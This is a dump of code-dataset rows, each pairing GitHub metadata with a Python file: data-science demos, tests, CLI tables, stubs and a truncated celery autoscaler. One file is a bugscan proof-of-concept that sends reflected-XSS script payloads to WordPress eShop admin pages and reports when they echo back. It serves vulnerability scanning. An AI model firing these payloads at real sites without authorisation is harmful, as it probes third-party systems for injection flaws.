| blob_id (string, len 40) | directory_id (string, len 40) | path (string, len 3-288) | content_id (string, len 40) | detected_licenses (list, len 0-112) | license_type (2 classes) | repo_name (string, len 5-115) | snapshot_id (string, len 40) | revision_id (string, len 40) | branch_name (684 classes) | visit_date (timestamp[us], 2015-08-06 10:31:46 to 2023-09-06 10:44:38) | revision_date (timestamp[us], 1970-01-01 02:38:32 to 2037-05-03 13:00:00) | committer_date (timestamp[us], 1970-01-01 02:38:32 to 2023-09-06 01:08:06) | github_id (int64, 4.92k to 681M, nullable) | star_events_count (int64, 0 to 209k) | fork_events_count (int64, 0 to 110k) | gha_license_id (22 classes) | gha_event_created_at (timestamp[us], 2012-06-04 01:52:49 to 2023-09-14 21:59:50, nullable) | gha_created_at (timestamp[us], 2008-05-22 07:58:19 to 2023-08-21 12:35:19, nullable) | gha_language (147 classes) | src_encoding (25 classes) | language (1 class) | is_vendor (bool) | is_generated (bool) | length_bytes (int64, 128 to 12.7k) | extension (142 classes) | content (string, len 128 to 8.19k) | authors (list, len 1) | author_id (string, len 1-132) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
03a090ef84ebad55c3aca6d91af5ba0140a7717e
|
0d8ee78f61660343e5feec41a53269dbf5585fa3
|
/Demo11/detect_nan.py
|
17ba54a1b6bb67f238e3c1cd79adac06a036808d
|
[] |
no_license
|
x-jeff/Python_Code_Demo
|
41b033f089fa19d8c63b2f26bf66ef379738c4ad
|
9bc458b08cfae0092e8f11a54031ca2e7017affc
|
refs/heads/master
| 2023-07-29T16:34:34.222620
| 2023-07-09T10:38:23
| 2023-07-09T10:38:23
| 176,306,727
| 7
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,509
|
py
|
import numpy as np
import pandas as pd
# Use np.nan to represent a missing value
print(np.nan)
# Build a dataset that contains missing values
df=pd.DataFrame([["Tim","M",24,169,100],["Jack","M",np.nan,177,140],["Jessy","F",21,162,np.nan],["Mary","F",23,159,87]])
# Assign column names
df.columns=["Name","Gender","Age","Height","Weight"]
print(df)
# Check whether any missing values exist
# Check whether row 1 contains missing values
print(df.loc[0].isnull().values.any())  # False means no missing values
print(df[0:1].isnull().values.any())  # another way to check row 1 for missing values
# Check whether column 3 contains missing values
print(df["Age"].isnull().values.any())  # True means missing values exist
# Check whether the whole DataFrame contains missing values
print(df.isnull().values.any())  # True means the DataFrame contains missing values
# Locate the missing values
# Locate the missing values in row 4
print(df.loc[3].isnull())  # False = present, True = missing
print(df.loc[3].notnull())  # False = missing, True = present
# Locate the missing values in column 5
print(df["Weight"].isnull())
print(df["Weight"].notnull())
# Show missing-value positions for the whole DataFrame
print(df.isnull())
print(df.notnull())
# Check every column at once for missing values
print(df.isnull().any())
# Count the missing values
# Count the missing values in row 2
print(df.loc[1].isnull().sum())
# Count the missing values in column 3
print(df["Age"].isnull().sum())
# Count the missing values in the whole DataFrame
print(df.isnull().sum())  # per-column counts
print(df.isnull().sum().sum())  # grand total
|
[
"jeff.xinsc@gmail.com"
] |
jeff.xinsc@gmail.com
|
79ca884a8a20ea2993f277d5ff1ca22a268617bf
|
e0c8662a56d89730043146ddc340e9e0b9f7de72
|
/plugin/1193d0d2-1596.py
|
393dab9cbff6fc791ad1a466479311cea838e4a3
|
[] |
no_license
|
izj007/bugscan_poc
|
f2ef5903b30b15c230b292a1ff2dc6cea6836940
|
4490f3c36d4033bdef380577333722deed7bc758
|
refs/heads/master
| 2020-09-22T17:20:50.408078
| 2019-01-18T09:42:47
| 2019-01-18T09:42:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 953
|
py
|
# -*- coding: utf-8 -*-
from lib.curl import *
"""
POC Name : WordPress eShop Plugin 6.2.8 Multiple Cross Site Scripting Vulnerabilities
From : http://www.exploit-db.com/exploits/36038/
"""
def assign(service, arg):
if service == "wordpress":
return True, arg
def audit(arg):
payloads = ("wp-admin/admin.php?page=eshop-templates.php&eshoptemplate=%22%3E%3Cscript%3Ealert%28%2Fhello_topper%2f%29;%3C/script%3E",
"wp-admin/admin.php?page=eshop-orders.php&view=1&action=%22%3E%3Cscript%3Ealert%28%2Fhello_topper%2f%29;%3C/script%3E")
for payload in payloads:
target_url=arg + payload
code, head, res, errcode, _ = curl.curl(target_url)
        if code == 200 and res.find('alert(/hello_topper/)') != -1:
            security_info(target_url + ' WordPress eShop Reflected XSS')
if __name__ == '__main__':
import sys
from dummy import *
audit(assign('wordpress', 'http://www.example.com/')[1])
|
[
"yudekui@wsmtec.com"
] |
yudekui@wsmtec.com
|
4019557ed0cfcbf40d9968b2c7b943898e927a02
|
8b5d68c9398186cae64dbcc5b293d62d69e1921d
|
/src/python/knowledge_base/resolvers/external_uri_resolver.py
|
04e75899a585cc5c3a751bae5e325ba7624f7e60
|
[
"Apache-2.0"
] |
permissive
|
reynoldsm88/Hume
|
ec99df21e9b9651ec3cacfb8655a510ba567abc9
|
79a4ae3b116fbf7c9428e75a651753833e5bc137
|
refs/heads/master
| 2020-07-24T21:28:39.709145
| 2019-07-10T15:43:24
| 2019-07-10T15:43:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,032
|
py
|
from knowledge_base import KnowledgeBase
from kb_resolver import KBResolver
from utilities.awake_db import AwakeDB
class ExternalURIResolver(KBResolver):
    def __init__(self):
pass
def resolve(self, kb, awake_db):
print "ExternalURIResolver RESOLVE"
resolved_kb = KnowledgeBase()
super(ExternalURIResolver, self).copy_all(resolved_kb, kb)
if awake_db == "NA":
return resolved_kb
kb_entity_to_entity_group = dict()
for entgroupid, kb_entity_group in resolved_kb.get_entity_groups():
for kb_entity in kb_entity_group.members:
kb_entity_to_entity_group[kb_entity] = kb_entity_group
AwakeDB.initialize_awake_db(awake_db)
for entid, kb_entity in resolved_kb.entid_to_kb_entity.iteritems():
kb_entity_group = kb_entity_to_entity_group[kb_entity]
source_string = AwakeDB.get_source_string(kb_entity_group.actor_id)
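            # Rewrite dbpedia resource URIs into their en.wikipedia.org equivalents.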
if source_string is not None and source_string.find("dbpedia.org") != -1:
                source_string = source_string.strip()
if source_string.startswith("<"):
source_string = source_string[1:]
if source_string.endswith(">"):
source_string = source_string[0:-1]
source_string = source_string.replace("dbpedia.org/resource", "en.wikipedia.org/wiki", 1)
kb_entity.properties["external_uri"] = source_string
# For countries, add geoname_id to properties
if (kb_entity_group.actor_id is not None
and "external_uri" not in kb_entity.properties
and "geonameid" not in kb_entity.properties):
geonameid = AwakeDB.get_geonameid_from_actorid(kb_entity_group.actor_id)
if geonameid is not None and len(str(geonameid).strip()) != 0:
kb_entity.properties["geonameid"] = str(geonameid)
return resolved_kb
|
[
"hqiu@bbn.com"
] |
hqiu@bbn.com
|
be3e5ac6319e9a7c5be95767c07575e031faad4e
|
06f7ffdae684ac3cc258c45c3daabce98243f64f
|
/vsts/vsts/service_endpoint/v4_1/models/__init__.py
|
47ad6d9342d71732fff5ee083b4be1aa50f569bb
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
kenkuo/azure-devops-python-api
|
7dbfb35f1c9637c9db10207824dd535c4d6861e8
|
9ac38a97a06ee9e0ee56530de170154f6ed39c98
|
refs/heads/master
| 2020-04-03T17:47:29.526104
| 2018-10-25T17:46:09
| 2018-10-25T17:46:09
| 155,459,045
| 0
| 0
|
MIT
| 2018-10-30T21:32:43
| 2018-10-30T21:32:42
| null |
UTF-8
|
Python
| false
| false
| 3,189
|
py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from .authentication_scheme_reference import AuthenticationSchemeReference
from .authorization_header import AuthorizationHeader
from .client_certificate import ClientCertificate
from .data_source import DataSource
from .data_source_binding import DataSourceBinding
from .data_source_binding_base import DataSourceBindingBase
from .data_source_details import DataSourceDetails
from .dependency_binding import DependencyBinding
from .dependency_data import DependencyData
from .depends_on import DependsOn
from .endpoint_authorization import EndpointAuthorization
from .endpoint_url import EndpointUrl
from .graph_subject_base import GraphSubjectBase
from .help_link import HelpLink
from .identity_ref import IdentityRef
from .input_descriptor import InputDescriptor
from .input_validation import InputValidation
from .input_value import InputValue
from .input_values import InputValues
from .input_values_error import InputValuesError
from .reference_links import ReferenceLinks
from .result_transformation_details import ResultTransformationDetails
from .service_endpoint import ServiceEndpoint
from .service_endpoint_authentication_scheme import ServiceEndpointAuthenticationScheme
from .service_endpoint_details import ServiceEndpointDetails
from .service_endpoint_execution_data import ServiceEndpointExecutionData
from .service_endpoint_execution_owner import ServiceEndpointExecutionOwner
from .service_endpoint_execution_record import ServiceEndpointExecutionRecord
from .service_endpoint_execution_records_input import ServiceEndpointExecutionRecordsInput
from .service_endpoint_request import ServiceEndpointRequest
from .service_endpoint_request_result import ServiceEndpointRequestResult
from .service_endpoint_type import ServiceEndpointType
__all__ = [
'AuthenticationSchemeReference',
'AuthorizationHeader',
'ClientCertificate',
'DataSource',
'DataSourceBinding',
'DataSourceBindingBase',
'DataSourceDetails',
'DependencyBinding',
'DependencyData',
'DependsOn',
'EndpointAuthorization',
'EndpointUrl',
'GraphSubjectBase',
'HelpLink',
'IdentityRef',
'InputDescriptor',
'InputValidation',
'InputValue',
'InputValues',
'InputValuesError',
'ReferenceLinks',
'ResultTransformationDetails',
'ServiceEndpoint',
'ServiceEndpointAuthenticationScheme',
'ServiceEndpointDetails',
'ServiceEndpointExecutionData',
'ServiceEndpointExecutionOwner',
'ServiceEndpointExecutionRecord',
'ServiceEndpointExecutionRecordsInput',
'ServiceEndpointRequest',
'ServiceEndpointRequestResult',
'ServiceEndpointType',
]
|
[
"tedchamb@microsoft.com"
] |
tedchamb@microsoft.com
|
0c0bbbb50d63c87813b656441d38ee608227be9a
|
8b7778d3c65f3688105e43718152da2c734ffa26
|
/3.Application_Test/cases/YBJZ_Test/Pay_Test.py
|
1fa5b3afab9534fdabc988bd759629709f20a863
|
[] |
no_license
|
zzworkaccount/OpenSourceLibrary
|
ab49b3f431c0474723dfad966ca09e29b07527eb
|
0f99f881eb8a1f4ddebbc5e7676289d01e6ffe19
|
refs/heads/main
| 2023-01-29T05:02:56.341004
| 2020-12-03T12:05:59
| 2020-12-03T12:05:59
| 315,920,584
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,123
|
py
|
# Expense entry test
import unittest
from time import sleep
from lib.Tally.Action import Action
class Test_Pay(unittest.TestCase):
    def setUp(self):
        self.lg = Action()
        self.driver = self.lg.driver
    def test_pay(self):
        """Record an expense and verify the result."""
        self.lg.do_pay()
        sleep(1)
        count = 0
        # Fetch the text shown after the payment is recorded
        pay_text = self.driver.find_element_by_xpath\
            ('(//*/android.widget.LinearLayout[2]/android.widget.LinearLayout/'
             'android.widget.LinearLayout/android.widget.FrameLayout/'
             'android.widget.LinearLayout/android.widget.TextView[1])').text
        num_text = self.driver.find_element_by_xpath\
            ('(//*/android.widget.LinearLayout[2]/android.widget.LinearLayout/'
             'android.widget.LinearLayout/android.widget.FrameLayout/'
             'android.widget.LinearLayout/android.widget.TextView[2])').text
        expect = 1
        if '餐饮' in pay_text and '-520' == num_text:  # '餐饮' is the "dining" category label
            count += 1
        # Assert with the framework-provided helper
        self.assertEqual(count, expect)
|
[
"1434895836@qq.com"
] |
1434895836@qq.com
|
9552995971c569ff4f8f6eca60a9625ec1a652e2
|
3bae1ed6460064f997264091aca0f37ac31c1a77
|
/pyapps/sampleapp/impl/action/core/job/getXMLSchema/1_job_getXMLSchema.py
|
02e7f9e335610b4d5303567e07cd2003e0de3f8c
|
[] |
no_license
|
racktivity/ext-pylabs-core
|
04d96b80ac1942754257d59e91460c3a141f0a32
|
53d349fa6bee0ccead29afd6676979b44c109a61
|
refs/heads/master
| 2021-01-22T10:33:18.523799
| 2017-06-08T09:09:28
| 2017-06-08T09:09:28
| 54,314,984
| 0
| 0
| null | 2017-06-08T09:09:29
| 2016-03-20T11:55:01
|
Python
|
UTF-8
|
Python
| false
| false
| 147
|
py
|
__author__ = 'incubaid'
__priority__ = 3
def main(q, i, p, params, tags):
    params['result'] = ''
def match(q, i, params, tags):
    return True
|
[
"devnull@localhost"
] |
devnull@localhost
|
fe4a67605c3ed774089ea1c726953328a7291e58
|
15581a76b36eab6062e71d4e5641cdfaf768b697
|
/LeetCode_30days_challenge/2020/May/First Bad Version.py
|
714967601f2406326187fa685495ac2b041efcf6
|
[] |
no_license
|
MarianDanaila/Competitive-Programming
|
dd61298cc02ca3556ebc3394e8d635b57f58b4d2
|
3c5a662e931a5aa1934fba74b249bce65a5d75e2
|
refs/heads/master
| 2023-05-25T20:03:18.468713
| 2023-05-16T21:45:08
| 2023-05-16T21:45:08
| 254,296,597
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 206
|
py
|
def firstBadVersion(n):
    # Binary search for the smallest version for which isBadVersion is True.
    # A bad version is assumed to exist, as the problem statement guarantees.
    ans = n
    l = 0
    r = n
    while l <= r:
        m = l + (r - l) // 2  # overflow-safe midpoint
        if isBadVersion(m):
            ans = m  # m is bad, but an earlier bad version may still exist
            r = m - 1
        else:
            l = m + 1
    return ans
|
[
"mariandanaila01@gmail.com"
] |
mariandanaila01@gmail.com
|
48a0486d3ecc70762a4a94e5d1b121b090b5cb54
|
7357d367b0af4650ccc5b783b7a59090fdde47bb
|
/workalendar/usa/new_jersey.py
|
9bd916ca02e66d3026491150081c6ec359dc4184
|
[
"MIT"
] |
permissive
|
BarracudaPff/code-golf-data-python
|
fb0cfc74d1777c4246d56a5db8525432bf37ab1a
|
42e8858c2ebc6a061012bcadb167d29cebb85c5e
|
refs/heads/main
| 2023-05-29T05:52:22.856551
| 2020-05-23T22:12:48
| 2020-05-23T22:12:48
| 378,832,634
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 295
|
py
|
from __future__ import absolute_import, division, print_function, unicode_literals
from ..registry_tools import iso_register
from .core import UnitedStates
@iso_register("US-NJ")
class NewJersey(UnitedStates):
"""New Jersey"""
include_good_friday = True
include_election_day_every_year = True
|
[
"sokolov.yas@gmail.com"
] |
sokolov.yas@gmail.com
|
85680cb8d5a23c4dd6047fa67e2115f85b2e1ca1
|
ca17bd80ac1d02c711423ac4093330172002a513
|
/find_leaves/FindLeaves.py
|
abce20d217199c2a3c79ac375c09f9dd3dcd5f44
|
[] |
no_license
|
Omega094/lc_practice
|
64046dea8bbdaee99d767b70002a2b5b56313112
|
e61776bcfd5d93c663b247d71e00f1b298683714
|
refs/heads/master
| 2020-03-12T13:45:13.988645
| 2018-04-23T06:28:32
| 2018-04-23T06:28:32
| 130,649,699
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,461
|
py
|
import sys
sys.path.append("/Users/jinzhao/leetcode/")
from leetcode.common import *
class Solution(object):
def isLeaf(self, root):
if root:
return not root.left and not root.right
return False
def deleteLeaf(self, root, solution):
if root:
if root.left:
if self.isLeaf(root.left):
solution.append(root.left.val)
root.left = None
else:
self.deleteLeaf(root.left, solution)
if root.right:
if self.isLeaf(root.right):
solution.append(root.right.val)
root.right = None
else:
self.deleteLeaf(root.right, solution)
return solution
def findLeaves(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
parent = TreeNode(0)
parent.right = root
solutionList = []
while parent.right:
#The line below could be removed for submission.
pretty_print_tree(parent.right, [])
            solution = self.deleteLeaf(parent, [])
if solution :
solutionList.append(solution)
return solutionList
if __name__ == "__main__":
sol = Solution()
root = build_tree_by_level([1,2,3,4,5,6,7])
#pretty_print_tree(root, [])
print sol.findLeaves(root)
|
[
"zhao_j1@denison.edu"
] |
zhao_j1@denison.edu
|
52f0bbbdbef2c865ea39664ab4a748fe1eddfdcd
|
325fde42058b2b82f8a4020048ff910cfdf737d7
|
/src/quantum/azext_quantum/commands.py
|
8dba4d309945625ee9a7487899150bcbc8cc9495
|
[
"LicenseRef-scancode-generic-cla",
"MIT"
] |
permissive
|
ebencarek/azure-cli-extensions
|
46b0d18fe536fe5884b00d7ffa30f54c7d6887d1
|
42491b284e38f8853712a5af01836f83b04a1aa8
|
refs/heads/master
| 2023-04-12T00:28:44.828652
| 2021-03-30T22:34:13
| 2021-03-30T22:34:13
| 261,621,934
| 2
| 5
|
MIT
| 2020-10-09T18:21:52
| 2020-05-06T01:25:58
|
Python
|
UTF-8
|
Python
| false
| false
| 5,417
|
py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long
from collections import OrderedDict
from azure.cli.core.commands import CliCommandType
from ._validators import validate_workspace_info, validate_target_info, validate_workspace_and_target_info, validate_workspace_info_no_location, validate_provider_and_sku_info
def transform_targets(providers):
def one(provider, target):
return OrderedDict([
('Provider', provider),
('Target-id', target['id']),
('Current Availability', target['currentAvailability']),
('Average Queue Time (seconds)', target['averageQueueTime'])
])
return [
one(provider['id'], target)
for provider in providers
for target in provider['targets']
]
def transform_job(result):
result = OrderedDict([
('Name', result['name']),
('Id', result['id']),
('Status', result['status']),
('Target', result['target']),
('Submission time', result['creationTime']),
('Completion time', result['endExecutionTime'])
])
return result
def transform_jobs(results):
def creation(job):
return job['creationTime']
return [transform_job(job) for job in sorted(results, key=creation, reverse=True)]
def transform_offerings(offerings):
def one(offering):
return OrderedDict([
('Provider Id', offering['id']),
('SKUs', ', '.join([s['id'] for s in offering['properties']['skus']])),
('Publisher ID', offering['properties']['managedApplication']['publisherId']),
('Offer ID', offering['properties']['managedApplication']['offerId'])
])
return [one(offering) for offering in offerings]
def transform_output(results):
def one(key, value):
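        # Render one histogram row: the frequency plus a text bar proportional to it.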
repeat = round(20 * value)
barra = "\u2588" * repeat
return OrderedDict([
('Result', key),
('Frequency', f"{value:10.8f}"),
('', f"\u2590{barra:<22} |"),
])
if 'Histogram' in results:
histogram = results['Histogram']
        # The histogram is serialized as a flat list whose entries alternate key, value;
        # make sure we have an even number of entries.
if (len(histogram) % 2) == 0:
table = []
items = range(0, len(histogram), 2)
for i in items:
key = histogram[i]
value = histogram[i + 1]
table.append(one(key, value))
return table
elif 'histogram' in results:
histogram = results['histogram']
return [one(key, histogram[key]) for key in histogram]
return results
def load_command_table(self, _):
workspace_ops = CliCommandType(operations_tmpl='azext_quantum.operations.workspace#{}')
job_ops = CliCommandType(operations_tmpl='azext_quantum.operations.job#{}')
target_ops = CliCommandType(operations_tmpl='azext_quantum.operations.target#{}')
offerings_ops = CliCommandType(operations_tmpl='azext_quantum.operations.offerings#{}')
with self.command_group('quantum workspace', workspace_ops) as w:
w.command('create', 'create')
w.command('delete', 'delete', validator=validate_workspace_info_no_location)
w.command('list', 'list')
w.show_command('show', validator=validate_workspace_info_no_location)
w.command('set', 'set', validator=validate_workspace_info)
w.command('clear', 'clear')
w.command('quotas', 'quotas', validator=validate_workspace_info)
with self.command_group('quantum target', target_ops) as t:
t.command('list', 'list', validator=validate_workspace_info, table_transformer=transform_targets)
t.show_command('show', validator=validate_target_info)
t.command('set', 'set', validator=validate_target_info)
t.command('clear', 'clear')
with self.command_group('quantum job', job_ops) as j:
j.command('list', 'list', validator=validate_workspace_info, table_transformer=transform_jobs)
j.show_command('show', validator=validate_workspace_info, table_transformer=transform_job)
j.command('submit', 'submit', validator=validate_workspace_and_target_info, table_transformer=transform_job)
j.command('wait', 'wait', validator=validate_workspace_info, table_transformer=transform_job)
j.command('output', 'output', validator=validate_workspace_info, table_transformer=transform_output)
with self.command_group('quantum', job_ops, is_preview=True) as q:
q.command('run', 'run', validator=validate_workspace_and_target_info, table_transformer=transform_output)
q.command('execute', 'run', validator=validate_workspace_and_target_info, table_transformer=transform_output)
with self.command_group('quantum offerings', offerings_ops) as o:
o.command('list', 'list_offerings', table_transformer=transform_offerings)
o.command('accept-terms', 'accept_terms', validator=validate_provider_and_sku_info)
o.command('show-terms', 'show_terms', validator=validate_provider_and_sku_info)
|
[
"noreply@github.com"
] |
ebencarek.noreply@github.com
|
a4abde74b1d48317424e2021da5db8a2da70ee28
|
14e36010b98895e08bd9edfcbc60dce30cbfb82b
|
/oneflow/python/test/modules/test_argmax.py
|
2f6e97661d6adf0677afe950e239b03a88c32db5
|
[
"Apache-2.0"
] |
permissive
|
duzhanyuan/oneflow
|
a9719befbfe112a7e2dd0361ccbd6d71012958fb
|
c6b47a3e4c9b5f97f5bc9f60bc1401313adc32c5
|
refs/heads/master
| 2023-06-21T20:31:55.828179
| 2021-07-20T16:10:02
| 2021-07-20T16:10:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,326
|
py
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
from collections import OrderedDict
import numpy as np
import oneflow.experimental as flow
from test_util import GenArgList
def _test_argmax_axis_negative(test_case, device):
input = flow.Tensor(
np.random.randn(2, 6, 5, 3), dtype=flow.float32, device=flow.device(device),
)
axis = -1
of_out = flow.argmax(input, dim=axis)
np_out = np.argmax(input.numpy(), axis=axis)
test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
def _test_tensor_argmax(test_case, device):
input = flow.Tensor(
np.random.randn(2, 6, 5, 3), dtype=flow.float32, device=flow.device(device),
)
axis = 0
of_out = input.argmax(dim=axis)
np_out = np.argmax(input.numpy(), axis=axis)
test_case.assertTrue(np.array_equal(of_out.numpy().shape, np_out.shape))
test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
def _test_argmax_axis_positive(test_case, device):
input = flow.Tensor(
np.random.randn(2, 6, 5, 3), dtype=flow.float32, device=flow.device(device),
)
axis = 1
of_out = flow.argmax(input, dim=axis)
np_out = np.argmax(input.numpy(), axis=axis)
test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
def _test_argmax_keepdims(test_case, device):
input = flow.Tensor(
np.random.randn(2, 6, 5, 3), dtype=flow.float32, device=flow.device(device),
)
axis = 0
of_out = input.argmax(axis, True)
np_out = np.argmax(input.numpy(), axis=axis)
np_out = np.expand_dims(np_out, axis=axis)
test_case.assertTrue(np.array_equal(of_out.numpy().shape, np_out.shape))
test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
def _test_argmax_dim_equal_none(test_case, device):
input = flow.Tensor(
np.random.randn(2, 6, 5, 3), dtype=flow.float32, device=flow.device(device),
)
of_out = input.argmax()
np_out = np.argmax(input.numpy().flatten(), axis=0)
test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
@flow.unittest.skip_unless_1n1d()
class TestArgmax(flow.unittest.TestCase):
def test_argmax(test_case):
arg_dict = OrderedDict()
arg_dict["test_fun"] = [
            _test_argmax_axis_negative,
_test_tensor_argmax,
            _test_argmax_axis_positive,
_test_argmax_keepdims,
_test_argmax_dim_equal_none,
]
arg_dict["device"] = ["cpu", "cuda"]
for arg in GenArgList(arg_dict):
arg[0](test_case, *arg[1:])
if __name__ == "__main__":
unittest.main()
|
[
"noreply@github.com"
] |
duzhanyuan.noreply@github.com
|
aebfc07c7c0647c4cf50ffd3727a29c3a1a1bbf5
|
8dbb2a3e2286c97b1baa3ee54210189f8470eb4d
|
/kubernetes-stubs/client/models/v1_portworx_volume_source.pyi
|
b25062ce2dce6c1b5d1c6d991321863933c2432c
|
[] |
no_license
|
foodpairing/kubernetes-stubs
|
e4b0f687254316e6f2954bacaa69ff898a88bde4
|
f510dc3d350ec998787f543a280dd619449b5445
|
refs/heads/master
| 2023-08-21T21:00:54.485923
| 2021-08-25T03:53:07
| 2021-08-25T04:45:17
| 414,555,568
| 0
| 0
| null | 2021-10-07T10:26:08
| 2021-10-07T10:26:08
| null |
UTF-8
|
Python
| false
| false
| 565
|
pyi
|
import datetime
import typing
import kubernetes.client
class V1PortworxVolumeSource:
fs_type: typing.Optional[str]
read_only: typing.Optional[bool]
volume_id: str
def __init__(
self,
*,
fs_type: typing.Optional[str] = ...,
read_only: typing.Optional[bool] = ...,
volume_id: str
) -> None: ...
def to_dict(self) -> V1PortworxVolumeSourceDict: ...
class V1PortworxVolumeSourceDict(typing.TypedDict, total=False):
fsType: typing.Optional[str]
readOnly: typing.Optional[bool]
volumeID: str
|
[
"nikhil.benesch@gmail.com"
] |
nikhil.benesch@gmail.com
|
949ad3a1372e9c39832994758556504087695f10
|
2fd0c65aa0f72133f773dac5d9a5c48fe9e26fac
|
/Dsz/PyScripts/Lib/dsz/mca/survey/cmd/registryquery/__init__.py
|
83cc81184494f05024215cd8ec32607526a0ff9d
|
[] |
no_license
|
FingerLeakers/DanderSpritz_docs
|
f5d2430e0b86b1b2f0684f02ddd4fa973a5a7364
|
d96b6a71c039b329f9f81544f645857c75360e7f
|
refs/heads/master
| 2021-01-25T13:05:51.732149
| 2018-03-08T01:22:49
| 2018-03-08T01:22:49
| 123,527,268
| 2
| 0
| null | 2018-03-02T03:48:31
| 2018-03-02T03:48:30
| null |
UTF-8
|
Python
| false
| false
| 362
|
py
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.10 (default, Feb 6 2017, 23:53:20)
# [GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.34)]
# Embedded file name: __init__.py
from errors import *
from types import *
from type_Params import *
from type_KeyInfo import *
from type_Subkey import *
from type_Value import *
|
[
"francisck@protonmail.ch"
] |
francisck@protonmail.ch
|
1e749a5b71a5aaeafceab5a016ab8fc7637dfd16
|
8d5c9369b0fb398c5a6078f6cac43ba8d67202fa
|
/bscan.spec
|
279792b27d524a1ad2c5efe84281796470e6b245
|
[
"MIT"
] |
permissive
|
raystyle/bscan
|
45191c2c0d26fe450c5d95567b83d47dfcb4c692
|
1edf0c0e738153a294d5cdc1b69d8f167152d5a2
|
refs/heads/master
| 2020-04-25T03:15:37.186913
| 2019-02-09T22:23:44
| 2019-02-09T22:23:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 724
|
spec
|
# -*- mode: python -*-
block_cipher = None
added_files = [
('bscan/configuration/', 'configuration',),
]
a = Analysis(
['bscan/__main__.py'],
binaries=[],
datas=added_files,
hiddenimports=[],
hookspath=[],
runtime_hooks=[],
excludes=[],
win_no_prefer_redirects=False,
win_private_assemblies=False,
cipher=block_cipher,
noarchive=False
)
pyz = PYZ(
a.pure,
a.zipped_data,
cipher=block_cipher
)
exe = EXE(
pyz,
a.scripts,
a.binaries,
a.zipfiles,
a.datas,
[],
name='bscan',
debug=False,
bootloader_ignore_signals=False,
strip=False,
upx=True,
runtime_tmpdir=None,
console=True,
icon='static/app.ico'
)
|
[
"welch18@vt.edu"
] |
welch18@vt.edu
|
e16d5a370589fd4fcb8ab0377701d48a1d1d0853
|
e21c70d5b03633b4e0a89dfccb0cb8ccd88612d0
|
/venv/lib/python3.5/site-packages/celery/worker/autoscale.py
|
e21f73a0b61f250f23f6950d29d8adb767250aa1
|
[
"MIT"
] |
permissive
|
LavanyaRamkumar/Networking-app_Dynamic-Quiz
|
4d5540088b1e2724626dda8df0fd83442391b40f
|
4de8329845712864d3cc8e8b81cfce5a1207224d
|
refs/heads/master
| 2023-02-09T12:08:19.913354
| 2019-10-26T04:23:54
| 2019-10-26T04:23:54
| 173,337,916
| 1
| 1
|
MIT
| 2023-02-02T04:48:55
| 2019-03-01T16:56:13
|
Python
|
UTF-8
|
Python
| false
| false
| 4,883
|
py
|
# -*- coding: utf-8 -*-
"""Pool Autoscaling.
This module implements the internal thread responsible
for growing and shrinking the pool according to the
current autoscale settings.
The autoscale thread is only enabled if
the :option:`celery worker --autoscale` option is used.
"""
from __future__ import absolute_import, unicode_literals
import os
import threading
from time import sleep
from kombu.async.semaphore import DummyLock
from celery import bootsteps
from celery.five import monotonic
from celery.utils.log import get_logger
from celery.utils.threads import bgThread
from . import state
from .components import Pool
__all__ = ['Autoscaler', 'WorkerComponent']
logger = get_logger(__name__)
debug, info, error = logger.debug, logger.info, logger.error
AUTOSCALE_KEEPALIVE = float(os.environ.get('AUTOSCALE_KEEPALIVE', 30))
class WorkerComponent(bootsteps.StartStopStep):
"""Bootstep that starts the autoscaler thread/timer in the worker."""
label = 'Autoscaler'
conditional = True
requires = (Pool,)
def __init__(self, w, **kwargs):
self.enabled = w.autoscale
w.autoscaler = None
def create(self, w):
scaler = w.autoscaler = self.instantiate(
w.autoscaler_cls,
w.pool, w.max_concurrency, w.min_concurrency,
worker=w, mutex=DummyLock() if w.use_eventloop else None,
)
return scaler if not w.use_eventloop else None
def register_with_event_loop(self, w, hub):
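        # In event-loop mode, scaling is re-checked on every task message and on a keepalive timer.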
w.consumer.on_task_message.add(w.autoscaler.maybe_scale)
hub.call_repeatedly(
w.autoscaler.keepalive, w.autoscaler.maybe_scale,
)
class Autoscaler(bgThread):
"""Background thread to autoscale pool workers."""
def __init__(self, pool, max_concurrency,
min_concurrency=0, worker=None,
keepalive=AUTOSCALE_KEEPALIVE, mutex=None):
super(Autoscaler, self).__init__()
self.pool = pool
self.mutex = mutex or threading.Lock()
self.max_concurrency = max_concurrency
self.min_concurrency = min_concurrency
self.keepalive = keepalive
